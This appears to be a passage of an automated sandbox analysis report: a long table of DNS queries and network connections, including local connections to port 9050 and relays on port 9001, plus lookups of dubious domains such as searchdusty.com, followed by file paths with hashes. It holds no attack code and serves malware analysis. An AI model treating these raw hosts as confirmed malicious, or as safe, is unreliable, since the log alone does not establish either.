| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| US | 8.8.8.8:53 | 59.163.154.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.12.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.51.243.77.in-addr.arpa | udp |
| GB | 142.250.200.2:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 54.157.160.138:443 | ingest.make.rvapps.io | tcp |
| GB | 173.222.12.168:443 | 02179916.akstat.io | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 92.123.128.167:443 | www.bing.com | tcp |
| GB | 92.123.128.167:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 167.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 92.123.128.191:443 | th.bing.com | tcp |
| GB | 92.123.128.191:443 | th.bing.com | tcp |
| GB | 92.123.128.191:443 | th.bing.com | tcp |
| GB | 92.123.128.191:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 191.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.68:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| GB | 88.221.135.114:443 | aefd.nelreports.net | tcp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| GB | 88.221.135.114:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 114.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 88.221.135.114:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| DE | 140.82.121.9:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 9.121.82.140.in-addr.arpa | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.9:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 5.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.185:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 185.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.trustedantiviruscompare.com | udp |
| US | 174.138.119.38:443 | www.trustedantiviruscompare.com | tcp |
| US | 174.138.119.38:443 | www.trustedantiviruscompare.com | tcp |
| US | 8.8.8.8:53 | 38.119.138.174.in-addr.arpa | udp |
| US | 174.138.119.38:443 | www.trustedantiviruscompare.com | tcp |
| US | 174.138.119.38:443 | www.trustedantiviruscompare.com | tcp |
| US | 174.138.119.38:443 | www.trustedantiviruscompare.com | tcp |
| US | 174.138.119.38:443 | www.trustedantiviruscompare.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| GB | 92.123.128.145:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 145.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| GB | 142.250.187.219:443 | storage.googleapis.com | tcp |
| GB | 142.250.187.219:443 | storage.googleapis.com | tcp |
| GB | 142.250.187.219:443 | storage.googleapis.com | udp |
| US | 8.8.8.8:53 | prf.hn | udp |
| GB | 5.150.170.5:443 | prf.hn | tcp |
| GB | 5.150.170.5:443 | prf.hn | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.malwarebytes.com | udp |
| US | 192.0.66.233:443 | www.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 219.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.170.150.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.66.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dev.visualwebsiteoptimizer.com | udp |
| US | 8.8.8.8:53 | stats.wp.com | udp |
| US | 8.8.8.8:53 | plausible.io | udp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | tcp |
| GB | 143.244.38.136:443 | plausible.io | tcp |
| US | 192.0.76.3:443 | stats.wp.com | tcp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | udp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | udp |
| US | 8.8.8.8:53 | 137.102.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.38.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.76.0.192.in-addr.arpa | udp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | tcp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| GB | 143.244.38.136:443 | plausible.io | tcp |
| US | 8.8.8.8:53 | genesis.malwarebytes.com | udp |
| US | 44.206.136.150:443 | genesis.malwarebytes.com | tcp |
| US | 44.206.136.150:443 | genesis.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | pixel.wp.com | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 104.18.32.137:443 | privacyportal.onetrust.com | tcp |
| US | 8.8.8.8:53 | 150.136.206.44.in-addr.arpa | udp |
| US | 104.18.32.137:443 | privacyportal.onetrust.com | tcp |
| US | 104.18.32.137:443 | privacyportal.onetrust.com | tcp |
| US | 8.8.8.8:53 | js.driftt.com | udp |
| ES | 18.172.213.79:443 | js.driftt.com | tcp |
| US | 8.8.8.8:53 | conversation.api.drift.com | udp |
| US | 8.8.8.8:53 | customer.api.drift.com | udp |
| US | 8.8.8.8:53 | metrics.api.drift.com | udp |
| US | 8.8.8.8:53 | targeting.api.drift.com | udp |
| US | 8.8.8.8:53 | bootstrap.driftapi.com | udp |
| US | 8.8.8.8:53 | 79.213.172.18.in-addr.arpa | udp |
| ES | 18.172.226.121:443 | bootstrap.driftapi.com | tcp |
| US | 8.8.8.8:53 | api.company-target.com | udp |
| ES | 18.172.226.97:443 | api.company-target.com | tcp |
| US | 3.94.218.138:443 | targeting.api.drift.com | tcp |
| US | 8.8.8.8:53 | 121.226.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.226.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.218.94.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71521-21.chat.api.drift.com | udp |
| US | 54.80.75.144:443 | 71521-21.chat.api.drift.com | tcp |
| US | 8.8.8.8:53 | presence.api.drift.com | udp |
| US | 8.8.8.8:53 | event.api.drift.com | udp |
| US | 54.173.95.250:443 | presence.api.drift.com | tcp |
| US | 8.8.8.8:53 | 144.75.80.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.95.173.54.in-addr.arpa | udp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | udp |
| US | 8.8.8.8:53 | api.demandbase.com | udp |
| ES | 18.172.226.31:443 | api.demandbase.com | tcp |
| US | 8.8.8.8:53 | 31.226.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www-api.malwarebytes.com | udp |
| ES | 18.172.213.61:443 | www-api.malwarebytes.com | tcp |
| ES | 18.172.213.61:443 | www-api.malwarebytes.com | tcp |
| ES | 18.172.213.61:443 | www-api.malwarebytes.com | tcp |
| ES | 18.172.213.61:443 | www-api.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 61.213.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api2.amplitude.com | udp |
| US | 54.200.232.79:443 | api2.amplitude.com | tcp |
| US | 8.8.8.8:53 | 79.232.200.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ark.mwbsys.com | udp |
| US | 44.194.11.111:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| ES | 18.172.226.54:443 | cdn.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 111.11.194.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.226.172.18.in-addr.arpa | udp |
| US | 44.194.11.111:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| ES | 18.172.226.54:443 | cdn.mwbsys.com | tcp |
| US | 44.194.11.111:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| ES | 18.172.226.54:443 | cdn.mwbsys.com | tcp |
| US | 44.194.11.111:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| ES | 18.172.226.32:443 | cdn.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 32.226.172.18.in-addr.arpa | udp |
| US | 44.194.11.111:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| ES | 18.172.226.32:443 | cdn.mwbsys.com | tcp |
| US | 8.8.8.8:53 | ipv4.am.i.mullvad.net | udp |
| SE | 45.83.223.233:443 | ipv4.am.i.mullvad.net | tcp |
| US | 8.8.8.8:53 | holocron.mwbsys.com | udp |
| US | 34.232.165.72:443 | holocron.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 233.223.83.45.in-addr.arpa | udp |
| US | 34.232.165.72:443 | holocron.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 72.165.232.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api2.amplitude.com | udp |
| US | 44.228.101.211:443 | api2.amplitude.com | tcp |
| US | 8.8.8.8:53 | 211.101.228.44.in-addr.arpa | udp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 95.172.80.54.in-addr.arpa | udp |
| GB | 92.123.128.168:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 168.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iris.mwbsys.com | udp |
| US | 3.224.108.1:443 | iris.mwbsys.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 1.108.224.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.246.212.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | holocron.mwbsys.com | udp |
| US | 34.232.165.72:443 | holocron.mwbsys.com | tcp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 8.8.8.8:53 | crl.comodoca.com | udp |
| US | 104.18.38.233:80 | crl.comodoca.com | tcp |
| US | 172.64.149.23:80 | crl.comodoca.com | tcp |
| US | 104.18.38.233:80 | crl.comodoca.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.241.137:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 137.241.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirius.mwbsys.com | udp |
| US | 3.210.89.77:443 | sirius.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| ES | 18.172.226.32:443 | cdn.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| US | 8.8.8.8:53 | 77.89.210.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| GB | 92.123.128.187:443 | www.bing.com | tcp |
| GB | 92.123.128.187:443 | www.bing.com | tcp |
| GB | 92.123.128.187:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 187.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 92.123.128.181:443 | th.bing.com | tcp |
| GB | 92.123.128.181:443 | th.bing.com | tcp |
| GB | 92.123.128.169:443 | th.bing.com | tcp |
| GB | 92.123.128.169:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 181.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| US | 185.199.109.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api2.amplitude.com | udp |
| US | 54.214.97.231:443 | api2.amplitude.com | tcp |
| GB | 92.123.128.187:443 | th.bing.com | udp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 231.97.214.54.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:51034 | tcp | |
| DE | 217.79.179.177:9001 | tcp | |
| US | 199.254.238.52:443 | tcp | |
| US | 8.8.8.8:53 | 177.179.79.217.in-addr.arpa | udp |
| FR | 212.47.233.86:9001 | tcp | |
| DE | 138.201.196.252:9993 | tcp | |
| US | 8.8.8.8:53 | 86.233.47.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.196.201.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | holocron.mwbsys.com | udp |
| US | 44.208.104.213:443 | holocron.mwbsys.com | tcp |
| US | 8.8.8.8:53 | sirius.mwbsys.com | udp |
| US | 3.210.89.77:443 | sirius.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 213.104.208.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hubble.mb-cosmos.com | udp |
| ES | 18.172.213.38:443 | hubble.mb-cosmos.com | tcp |
| US | 8.8.8.8:53 | 38.213.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| GB | 92.123.128.146:443 | www.bing.com | udp |
| GB | 92.123.128.146:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 146.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 92.123.128.169:443 | th.bing.com | udp |
| GB | 92.123.128.161:443 | th.bing.com | udp |
| GB | 92.123.128.161:443 | th.bing.com | udp |
| GB | 92.123.128.169:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | 161.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 8.8.8.8:53 | api2.amplitude.com | udp |
| US | 18.246.205.124:443 | api2.amplitude.com | tcp |
| US | 8.8.8.8:53 | 124.205.246.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 92.123.128.161:443 | www.bing.com | tcp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| LT | 94.244.80.60:80 | tcp | |
| US | 8.8.8.8:53 | highway-traffic.com | udp |
| US | 8.8.8.8:53 | frequentwin.com | udp |
| US | 8.8.8.8:53 | www.vikingwebscanner.com | udp |
| US | 8.8.8.8:53 | searchdusty.com | udp |
| CA | 54.39.157.64:80 | searchdusty.com | tcp |
| US | 8.8.8.8:53 | fastsofgeld.com | udp |
| US | 8.8.8.8:53 | 64.157.39.54.in-addr.arpa | udp |
| CA | 54.39.157.64:80 | searchdusty.com | tcp |
| US | 8.8.8.8:53 | sirius.mwbsys.com | udp |
| US | 3.210.89.77:443 | sirius.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| DE | 18.155.145.12:443 | cdn.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 12.145.155.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | holocron.mwbsys.com | udp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 54.80.172.95:443 | holocron.mwbsys.com | tcp |
| US | 8.8.8.8:53 | api2.amplitude.com | udp |
| US | 52.42.215.144:443 | api2.amplitude.com | tcp |
| US | 8.8.8.8:53 | hubble.mb-cosmos.com | udp |
| US | 8.8.8.8:53 | 144.215.42.52.in-addr.arpa | udp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 8.8.8.8:53 | 64.145.155.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | crl.usertrust.com | udp |
| US | 104.18.38.233:80 | crl.usertrust.com | tcp |
| US | 8.8.8.8:53 | crl.comodoca.com | udp |
| US | 172.64.149.23:80 | crl.comodoca.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| US | 185.199.109.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api2.amplitude.com | udp |
| US | 35.167.65.36:443 | api2.amplitude.com | tcp |
| US | 8.8.8.8:53 | bestsecuritycentral.com | udp |
| US | 8.8.8.8:53 | holocron.mwbsys.com | udp |
| US | 34.232.165.72:443 | holocron.mwbsys.com | tcp |
| US | 8.8.8.8:53 | hubble.mb-cosmos.com | udp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| US | 34.212.246.47:443 | telemetry.malwarebytes.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
| DE | 18.155.145.64:443 | hubble.mb-cosmos.com | tcp |
Files
\??\pipe\crashpad_4164_YFTJFPZDHZLHKNPK
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4b852b04369d211cefa80a91731ddd8b |
| SHA1 | 00204527cee6994b79cafd41ea9418edb813d691 |
| SHA256 | 4f42970b9882d7f7e0e66165f73c4625ad83b0f11afa6284a9a40204f6d15b13 |
| SHA512 | 9469837e07fc60f207e3403a06e320a778af971a48a47ac656b0c953167216bb785c5ccfc47eb340ad8d2c434cb8633d5b54eeb43a3dc7d3b03438980fd413be |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 078844a6f8d0440bcae827fc8c36660e |
| SHA1 | 30b0c7fde29b7dcdd13be1ace3585aaee593956a |
| SHA256 | e0b6ff6b3dcabebb9216544ac33d4d6b6400f05e1cc7d2cc8ded0d2bf6c031be |
